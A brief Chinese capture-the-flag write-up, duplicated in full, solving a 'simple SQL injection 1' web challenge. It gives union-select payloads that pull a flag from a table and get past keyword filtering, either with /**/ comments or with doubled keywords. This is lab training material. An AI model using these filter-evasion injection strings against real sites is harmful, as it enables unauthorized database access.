题目链接:http://ctf5.shiyanbar.com/423/web/
简单的SQL注入之1,比2,3都简单一些。利用2 的查询语句也可以实现:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
经测试,简单的SQL注入1 过滤了关键字,重复写即可绕过,如:1' unionunion selectselect flag fromfrom web1.flag wherewhere '1'='1
题目链接:http://ctf5.shiyanbar.com/423/web/
简单的SQL注入之1,比2,3都简单一些。利用2 的查询语句也可以实现:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
经测试,简单的SQL注入1 过滤了关键字,重复写即可绕过,如:1' unionunion selectselect flag fromfrom web1.flag wherewhere '1'='1